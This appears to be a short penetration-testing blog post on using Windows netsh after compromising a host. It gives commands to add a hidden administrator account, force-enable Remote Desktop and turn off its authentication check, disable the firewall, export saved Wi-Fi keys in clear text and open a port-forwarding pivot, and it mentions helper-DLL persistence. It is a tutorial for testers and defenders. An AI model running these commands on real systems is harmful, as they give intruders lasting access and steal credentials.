
Netshell

Posted in Pentesting

Netshell in a Nutshell

netsh is a versatile command-line network utility built into Windows, available on Windows 7 and above. If you’ve compromised a Windows target and don’t have a fancy Meterpreter shell, netsh is a useful tool to enumerate, escalate or pivot. You can set firewall rules, open ports, check cached Wi-Fi credentials, configure port forwarding and much more.

Once you’ve got a shell on a Windows target, you can start off by checking the firewall state…

C:\>netsh
netsh>firewall show state

Depending on your privileges and how loud you’re willing to be, you can configure RDP for any post-exploitation tasks.

Add a new user, enable Remote Desktop and add the user to the relevant groups…

C:\>net user creosote pass123 /add
C:\>net localgroup administrators creosote /add
C:\>netsh firewall set service type = remotedesktop mode = enable
C:\>net localgroup "Remote Desktop Users" creosote /ADD

If you’re having trouble opening Remote Desktop with the above, try this…

C:\>reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

C:\>reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

C:\>sc config TermService start= auto

C:\>netsh firewall add portopening TCP 3389 "Remote Desktop"

# If you get a CredSSP error, try this…
C:\>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f


You can always disable the firewall if needed…

netsh>firewall set opmode mode=disable

If you’re conducting forensics or just enumerating and want to check wireless info (hosted networks, wireless profiles, etc.)…

netsh>wlan show all

It’s also possible to grab cached wireless credentials…

netsh>wlan export profile key=clear

Add port forwarding to pivot to other machines on the network…

netsh>interface portproxy add v4tov4 listenport=LPORT listenaddress=0.0.0.0 connectport=RPORT connectaddress=RHOST


Exploit netsh.exe

According to https://attack.mitre.org/wiki/Technique/T1128, it’s also possible to maintain persistence by registering a malicious DLL under the netsh helper DLL registry path. Netsh helper DLLs extend the functionality of the netsh utility, and can be loaded when netsh is started.

Out of curiosity I dove into this a little more and created a working PoC with a write-up here: http://liberty-shell.com/sec/2018/07/28/netshlep/

Various installed applications (like VPN clients) may run netsh by default. An attacker may also set netsh to execute on startup, triggering the malicious DLL and creating a route for persistence.

A PoC can also be found here: https://github.com/outflanknl/NetshHelperBeacon

